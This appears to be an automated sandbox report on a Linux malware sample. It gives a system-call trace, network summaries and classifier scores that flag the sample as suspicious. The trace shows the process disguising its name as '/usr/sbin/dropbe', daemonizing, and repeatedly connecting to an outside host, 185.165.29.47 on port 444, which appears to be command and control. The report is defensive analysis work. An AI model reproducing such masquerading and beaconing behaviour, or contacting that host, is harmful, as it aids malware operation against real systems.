4291 ioctl(1, TCGETS, 0xfffc0e90) = -1 ENOTTY (Inappropriate ioctl for device)
4291 prctl(PR_SET_NAME, "/usr/sbin/dropbe") = 0
4291 time(NULL) = 1571351692
4291 getpid() = 4291
4291 time(NULL) = 1571351692
4291 getpid() = 4291
4291 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 3
4291 connect(3, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 0
4291 getsockname(3, {sa_family=AF_INET, sin_port=htons(54082), sin_addr=inet_addr("192.168.122.147")}, [16]) = 0
4291 open("/proc/net/route", O_RDONLY) = 4
4291 close(4) = 0
4291 ioctl(3, SIOCGIFHWADDR, {ifr_name="ens3", ifr_hwaddr=52:54:00:94:44:aa}) = 0
4291 close(3) = 0
4291 fork() = 4292
4291 wait4(4292,
4292 fork() = 4293
4292 write(1, "BUILD RAZER\n", 12) = 12
4292 exit(0) = ?
4291 [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 4292
4291 --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=4292, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
4291 write(1, "BUILD RAZER\n", 12) = 12
4291 exit(0) = ?
4293 setsid() = 4293
4293 chdir("/") = 0
4293 rt_sigaction(SIGPIPE, {SIG_IGN, [PIPE], SA_RESTORER|SA_RESTART, 0x805208f}, {SIG_DFL, [], 0}, 8) = 0
4293 socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
4293 fcntl(3, F_GETFL) = 0x2 (flags O_RDWR)
4293 fcntl(3, F_SETFL, O_RDWR|O_NONBLOCK) = 0
4293 connect(3, {sa_family=AF_INET, sin_port=htons(444), sin_addr=inet_addr("185.165.29.47")}, 16) = -1 EINPROGRESS (Operation now in progress)
4293 _newselect(4, NULL, [3], NULL) = 0 (Timeout)
4293 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
4293 rt_sigaction(SIGCHLD, NULL, {SIG_DFL, [], 0}, 8) = 0
4293 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
4293 nanosleep({5, 1571351692}, 0xfffbfa14) = 0
4293 close(3) = 0
4293 socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
4293 fcntl(3, F_GETFL) = 0x2 (flags O_RDWR)
4293 fcntl(3, F_SETFL, O_RDWR|O_NONBLOCK) = 0
4293 connect(3, {sa_family=AF_INET, sin_port=htons(444), sin_addr=inet_addr("185.165.29.47")}, 16) = -1 EINPROGRESS (Operation now in progress)
4293 _newselect(4, NULL, [3], NULL, {30, 8}

Analysis
Ltrace
Statically-compiled samples cannot be ltraced.

Reason
Timeout

Status
Success

Strace
Success

Results
True

DNS
Query

Response

TCP
Info
localhost:57472 -> 185.165.29.47:444
localhost:57470 -> 185.165.29.47:444

UDP
Info
localhost:5353 -> 224.0.0.251:5353

HTTP
Info

Summary
DNS
False

TCP
True

UDP
True

HTTP
False

Binary
RF
confidence: 100.00%
suspicious: True
MLP
confidence: 99.98%
suspicious: True
SVM
confidence: 98.80%
suspicious: True